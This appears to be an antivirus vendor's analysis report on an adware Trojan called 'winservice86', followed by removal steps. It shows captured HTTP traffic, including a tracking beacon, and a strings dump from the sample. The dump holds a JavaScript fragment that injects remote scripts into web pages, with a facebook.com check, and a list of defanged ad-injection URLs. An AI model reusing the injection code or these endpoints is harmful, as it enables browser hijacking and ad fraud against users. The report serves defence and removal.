    .U....ZA1.0...U....Western Cape1.0...U....Durbanville1.0...U....Thawte
    1.0...U....Thawte Certification1.0...U....Thawte Timestamping CA..1512
    17000000Z..160331235959Z0...*.H..............X...;J..b. ..>..P.T...
    .u.^q;C..*8.....*!3......tZ<.Z......-....T...........>E2.....'s.
    ij.GL.........h.NNb.8.G..$.. u.7.....22...

    

    GET /tss-ca-g2.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: ts-crl.ws.symantec.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: Apache
    ETag: "564b9f6a1d7f5e7549d605d810a7bf38:1456392807"
    Last-Modified: Thu, 25 Feb 2016 09:01:25 GMT
    Date: Thu, 25 Feb 2016 17:42:19 GMT
    Content-Length: 477
    Connection: keep-alive
    Content-Type: application/pkix-crl
    0...0.....0...*.H........0^1.0...U....US1.0...U....Symantec Corporatio
    n100...U...'Symantec Time Stamping Services CA - G2..160225090125Z..16
    0306090125Z.00.0...U.#..0..._..n\..t...}.?..L...0...U........0...*.H..
    ...............A...X..1[...=/.G.j..1....,..8k...n.9.....@!....w.:..-..
    ..I.o.2.J...R.O".G....#...J..d7(.TZ.V._......H{[email protected].
    w...a..N...O..g..6...)...r..z......o<...q...D....T.|.....?Ju....M..
    )S.............N...*....kh...<.\>7...:(!z.#....W...2..A.^.C.HTTP
    /1.1 200 OK..Server: Apache..ETag: "564b9f6a1d7f5e7549d605d810a7bf38:1
    456392807"..Last-Modified: Thu, 25 Feb 2016 09:01:25 GMT..Date: Thu, 2
    5 Feb 2016 17:42:19 GMT..Content-Length: 477..Connection: keep-alive..
    Content-Type: application/pkix-crl..0...0.....0...*.H........0^1.0...U
    ....US1.0...U....Symantec Corporation100...U...'Symantec Time Stamping
     Services CA - G2..160225090125Z..160306090125Z.00.0...U.#..0..._..n\.
    .t...}.?..L...0...U........0...*.H.................A...X..1[...=/.G.j.
    .1....,..8k...n.9.....@!....w.:..-....I.o.2.J...R.O".G....#...J..d7(.T
    Z.V._......H{[email protected]...)...r..z.....
    .o<...q...D....T.|.....?Ju....M..)S.............N...*....kh...<.
    \>7...:(!z.#....W...2..A.^.C...

    

    GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: VVV.download.windowsupdate.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Cache-Control: max-age=604800
    Content-Type: text/plain
    Last-Modified: Thu, 28 Jan 2016 17:51:53 GMT
    Accept-Ranges: bytes
    ETag: "80823092f459d11:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Content-Length: 18
    Date: Thu, 25 Feb 2016 17:42:19 GMT
    Connection: keep-alive
    X-CCC: UA
    X-CID: 2
    1401D159F4929680B9....


    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
    

    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: VVV.download.windowsupdate.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Cache-Control: max-age=604800
    Content-Type: application/octet-stream
    Last-Modified: Thu, 28 Jan 2016 18:43:43 GMT
    Accept-Ranges: bytes
    ETag: "80d9e4cffb59d11:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Content-Length: 49661
    Date: Thu, 25 Feb 2016 17:42:19 GMT
    Connection: keep-alive
    X-CCC: UA
    X-CID: 2
    MSCF............,...................I.......d.........<H.T .authroo
    t.stl. ..-.8..CK...<Tk........./.........Z..e..P..D.&.BRTH...E..E.b
    .["$qS)....-...[..}.o~g...q...Y...n...........aF\!.lI.4..0..ef.W.....C
    `....Y..F.D5...Y.A....1.|..c.1...Nc.Y..x..D...NP[[email protected].....'.B.
    ......"(~3z-.@~..|}(.......g4.p.........h.n.dQz..t.V.......;.....Q...d
    /../.pJ...6....E...A.@..]..T9..28..,..p...).....P:}.K...]=.7X.f..9..yB
    .P....uP$$...Q.u..y..".=......7...........#.X..P.8....>U....v.[.$.e
    ...H.@~..........ea`.3...tLX...].-....<.........v.....M../..z6.t^..
    ...p....M...v(CP%F.......!eX..a...-..G.....S%..l.....Y..(.*.-....C.L0.
    ..G.....).rm8...(7.T{.Q...."...B`H.....3..9..-..Vv.5Q.e.W.../...RY.v.P
    . .........l......8'.&z......3.;:...U4.."....yu... .."....d .e/7.;.XD*
    tn%$.........];..fY.R...7.....o.=xh...]..4...\.:...v....t..9 .nO.i}.T.
    ./(uke..p.&.6.E#[email protected]...*.s....h......(/.s.%.3g...:*X.].7.IE....
    E,.w.8......v...r4.qOh}~..E.5t...l...(*..2....`..F..".a:.t....9...W.kO
    ?5..=..HhYrI.Sf..[:...3..2..)DB...;......(...B.......U(...._F./#.k@...
    .9c.Y..G'..]...p..;M_o..~.3?.}.1M.5.f5)._......t _.6...l..K....OsY.0..
    ....H...^..\$P;U....8..)...1........J...uE..#n.......h.......17.P=,P..
    ...}z.&..../..a.........p@.|KB..o.E..|..o.mr......m=.(v.:[email protected]
    >4y....P........F...&... ....r$d..{B...)..A.`..x4E'~`V.."..(..(./G.
    ..@_Q`.....O...~`..~...x..KN~....Dko/A{..!...W..G,`)...*...#......q`..
    H.........%m..G....5..4.....?.......F...{.%..2....l.L....."...Y.......
    . ...].\........... D..Y...!1..*.....M?..G..A.|Ex......~...s.!.=..
    <<< skipped >>>
    

    GET /monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201 HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    Host: logs.newdemoonlinecloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Thu, 25 Feb 2016 17:42:23 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1456422143.dop003.fr7.t,1456422143.cds050.fr7.c
    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 25 Feb 
    2016 17:42:23 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
    ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 
    Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
    5..Content-Type: image/gif..X-HW: 1456422143.dop003.fr7.t,1456422143.c
    ds050.fr7.c..GIF89a.............,...........D..;..

    

    GET /UTN-USERFirst-Object.crl HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: crl.usertrust.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 25 Feb 2016 17:42:22 GMT
    Content-Type: application/x-pkcs7-crl
    Content-Length: 75577
    Last-Modified: Wed, 24 Feb 2016 21:00:01 GMT
    Connection: close
    ETag: "56ce19d1-12739"
    X-CCACDN-Mirror-ID: h6edcacrl7
    Cache-Control: max-age=3600
    Accept-Ranges: bytes
    0..'40..&....0...*.H........0..1.0...U....US1.0...U....UT1.0...U....Sa
    lt Lake City1.0...U....The USERTRUST Network1!0...U....hXXp://VVV.user
    trust.com1.0...U....UTN-USERFirst-Object..160224210001Z..160228210001Z
    0..%.0"....2EY..aU..........050525083740Z0".....Iv...h ..ys.....050525
    090148Z0!..u.......|..xk.0...050602000000Z0".....6.z..........7..05060
    2075356Z0"....!.$.KM(C@="..o}..050603153950Z0".......W%Ny.vD.q..Y..050
    607084159Z0".......3W]...$.#\F4..050613095931Z0!......(.62..2PLr.q..05
    0630164737Z0"....BLA......)..5....050707141212Z0!..Wa........q#......0
    50711082844Z0!.._j.....o...'...m..050715130339Z0!..?........N]B..Z...0
    50721083234Z0!..RO.)@..Q...p._....050726090436Z0".....k......1.g......
    050729091017Z0"....l........o... ...050729134103Z0"....v.R..~...?.(..&
    ..050803165854Z0!..6..;....sC.M.s:...050809135135Z0!...........^nH.U.(
    ..050810132024Z0"......;.S...wU-K.c...050810211644Z0"......d..#IE..#|.
    g#..050811182050Z0"....!..|....]rR..-r..050817085053Z0"......Ai..xJ..q
    ]Xi...050822140450Z0!..>...........t'6...050824025640Z0!..?3..rd5&g
    t;ocV.. ....050824075512Z0"....|..5u[.}<..[[email protected]!..GJ
    .C...<NM.i......050912092806Z0!....(.8....U.1.'....050912144650Z0!.
    .*.(ECy.V.?x.3S_k..050915103419Z0!......./.....L...r..050919144257Z0!.
    .Y....=....#.......050929000000Z0!..p.,.g.x..z:q~.....050930114111Z0".
    ...-.."...\w...~....050930123007Z0!....o0........P.H...051004084832Z0"
    .......=6......4.....051005122403Z0!..md\\...~.v.o......051013100954Z0
    !...6.D...hR..BO._...051013110610Z0!..5.x.1..6.p~}>.....0510181
    <<< skipped >>>

    The Trojan connects to the servers at the folowing location(s):

    0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe_3000:

    .text
    `.rdata
    @.data
    .rsrc
    tCPjB
    8%u(j
    RegOpenKeyTransactedW
    RegCreateKeyTransactedW
    RegDeleteKeyTransactedW
    1.2.1
    Invalid HTTP(S) status code
    InternetCrackUrlW
    urlRedirected
    HttpQueryInfoW
    this module doesn't support file request
    InternetCrackUrl Failed
    port
    HttpOpenRequest Failed
    HttpSendRequest Failed with:
    HttpQueryInfo Failed
    HttpQueryInfoA
    requestUrl
    redirectUrl
    httpCode
    %d %d
    Mozilla\Mozilla Firefox
    9%D,3
    1.1.1.2
    inflate 1.2.7 Copyright 1995-2012 Mark Adler
    function not supported
    operation canceled
    address_family_not_supported
    operation_in_progress
    operation_not_supported
    protocol_not_supported
    operation_would_block
    address family not supported
    broken pipe
    inappropriate io control operation
    not supported
    operation in progress
    operation not permitted
    operation not supported
    operation would block
    protocol not supported
    GetProcessWindowStation
    operator
    VERSION.dll
    HttpOpenRequestW
    HttpSendRequestW
    WININET.dll
    GetProcessHeap
    PeekNamedPipe
    KERNEL32.dll
    USER32.dll
    GDI32.dll
    RegCloseKey
    RegCreateKeyExW
    RegDeleteKeyW
    RegEnumKeyExW
    RegOpenKeyExW
    RegQueryInfoKeyW
    ADVAPI32.dll
    ShellExecuteExW
    SHELL32.dll
    ole32.dll
    OLEAUT32.dll
    UrlEscapeW
    SHLWAPI.dll
    COMCTL32.dll
    GetCPInfo
    .?AVCAgentExe@@
    zcÁ
    <requestedExecutionLevel level='asInvoker' uiAccess='false' />
    {A#ND$chromever=
    Advapi32.dll
    Chrome-Profiles
    Firefox\Profiles
    ie-error.gif
    Wininet.dll
    hXXps://
    kernel32.dll
    iexplore.exe
    %d.%d.%d.%d
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
    Google\Chrome\Application\chrome.exe
    Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
    Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
    Software\Mozilla\Mozilla Firefox
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
    Mozilla Firefox\firefox.exe
    %d.%d (%d)
    SOFTWARE\Microsoft\Windows NT\CurrentVersion
    \0x%x
    HKEY_CLASSES_ROOT
    HKEY_CURRENT_USER
    HKEY_LOCAL_MACHINE
    HKEY_USERS
    HKEY_PERFORMANCE_DATA
    HKEY_DYN_DATA
    HKEY_CURRENT_CONFIG
    @crtorpedoie
    if (document && document.location && typeof document.location.host == 'string' && document.location.host.indexOf('facebook.com') >= 0 && 194 !== PLUGIN_ID_PLACEHOLDER){
    var tag = (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]);
    K.setAttribute('src', httpUrl);
    K.setAttribute('src', httpsUrl);
    if (!httpsUrl || httpsUrl.length === 0) {
    if ((typeof document.location.protocol === 'string') && (document.location.protocol.indexOf('https') === 0)) {
    K.setAttribute('type', 'text/javascript');
    var K = document.createElement('script');
    var httpsUrl = '__HTTPS_URL_PLACEHOLDER__';
    var httpUrl = '__HTTP_URL_PLACEHOLDER__';
    tag.appendChild(K);
    }, 500);
    if (!document || !document.body || !tag){
    if (!document || !document.body){
    __HTTP_URL_PLACEHOLDER__
    __HTTPS_URL_PLACEHOLDER__
    hXXps://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__
    hXXp://VVV.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=__CROSSRIDER_EXTENDED_SUB_ID__&partnername=__CROSSRIDER_APP_NAME__
    hXXps://i_crdrjs_info.tlscdn.com/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__
    hXXp://i.crdrjs.info/crdr/javascript.js?channel=crdr___CROSSRIDER_EXTENDED_SUB_ID__&appTitle=__CROSSRIDER_APP_NAME__&hid=__CROSSRIDER_USER_ID__
    hXXp://cdn.visadd.com/script/14567725765/preload.js?subid=__CROSSRIDER_SUB_ID__
    hXXps://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__
    hXXp://api.jollywallet.com/affiliate/client?dist=8&app_id=__CROSSRIDER_APP_ID__&s1=0&s2=0&s3=0&name=__CROSSRIDER_APP_NAME__
    hXXps://asrv-a.akamaihd.net/sd/1700/1043.js
    hXXp://asrv-a.akamaihd.net/sd/1700/1043.js
    hXXps://asrv-a.akamaihd.net/sd/1700/1037.js
    hXXp://asrv-a.akamaihd.net/sd/1700/1037.js
    hXXps://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__
    hXXp://ads.tfxiq.com/a.php?626ref2=__CROSSRIDER_SUB_ID__&626Name=__CROSSRIDER_APP_NAME__&626ref3=__CROSSRIDER_USER_ID__&626ref1=63726f73737269646572&teid=__CROSSRIDER_APP_ID__&tuid=__CROSSRIDER_INSTALLER_USER_ID__
    hXXps://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__
    hXXp://nps.noproblemppc.com/npsb/logic.js?OriginId=E8A4A23A-B034-E211-A9A0-001517D10F6E&SiteId=Sales&PartnerID=20000&ProductName=__CROSSRIDER_APP_NAME__&ToolbarId=__CROSSRIDER_EXTENDED_SUB_ID__
    hXXps://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__
    hXXp://cdncache1-a.akamaihd.net/sub/v3219bd/__CROSSRIDER_SUB_ID__/l.js?pid=1094&ext=__CROSSRIDER_APP_NAME__&systemid=__CROSSRIDER_INSTALLER_USER_ID__
    - CRT not initialized
    - Attempt to initialize the CRT more than once.
    - floating point support not loaded
    mscoree.dll
    USER32.DLL
    %Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe
    winservice86 exe
    1000.1000.1000.1000
    winservice86.exe


    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      GoogleUpdate.exe:1300
      GoogleUpdate.exe:1220
      GoogleUpdate.exe:1272
      GoogleUpdate.exe:3944
      GoogleUpdate.exe:476
      GoogleUpdate.exe:2032
      GoogleUpdate.exe:1936
      17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600
      f56fe68c-ded6-4656-a272-5100e7b20016.exe:356
      17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676
      17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936
      winservice86-bg.exe:2952
      winservice86-codedownloader.exe:2888
      winservice86-codedownloader.exe:2796
      regsvr32.exe:2472
      %original file name%.exe:1332
      0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000

    2. Delete the original Trojan file.
    3. Delete or disinfect the following files created/modified by the Trojan:

      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (54 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (934 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (2712 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (930 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (54 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (49 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
      %Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (2712 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\MSIcdd94.LOG (474 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
      %Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (7547 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 (113 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70 (75 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70 (232 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404 (228 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[2].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (825 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (685 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdate.dll (5441 bytes)
      %Program Files%\winservice86\b0eae4e3-6b8d-4874-83f1-2ee3fd4e727b.crx (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (7 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (45051 bytes)
      %Program Files%\winservice86\1293297481.mxaddon (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (6 bytes)
      %Program Files%\winservice86\winservice86-bho.dll (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (1358266 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (825 bytes)
      %Program Files%\winservice86\Newtonsoft.Json.dll (3073 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (12 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe (6841 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\223[1].js (823 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\200[1].js (887 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsr2.tmp (605555 bytes)
      %Program Files%\winservice86\SuperSocket.ClientEngine.Common.dll (23 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\246[1].js (769 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (869 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\273[1].js (903 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (429 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\424[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (905 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\plugins[1].json (2977 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\220[1].js (19969 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.xpi (1425 bytes)
      %Program Files%\winservice86\SuperSocket.ClientEngine.Protocol.dll (19 bytes)
      %Program Files%\winservice86\winservice86-codedownloader.exe (7433 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (953 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (4 bytes)
      %Program Files%\winservice86\background.html (729 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (2 bytes)
      %Program Files%\winservice86\winservice86.ico (9 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe (9098 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\288[1].js (963 bytes)
      %WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-11.job (76 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
      %Program Files%\winservice86\winservice86-bg.exe (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\253[1].js (735 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll (1281 bytes)
      %WinDir%\Tasks\f56fe68c-ded6-4656-a272-5100e7b20016.job (1620 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (1 bytes)
      %Program Files%\winservice86\WebSocket4Net.dll (64 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\91[1].js (88337 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (7 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (953 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\345[1].js (781 bytes)
      %WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-1.job (73 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (2 bytes)
      %Program Files%\winservice86\Interop.IWshRuntimeLibrary.dll (53 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (34023 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (27704 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (1 bytes)
      %WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (1066 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdateres_en.dll (26 bytes)
      %Program Files%\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe (32 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (493 bytes)
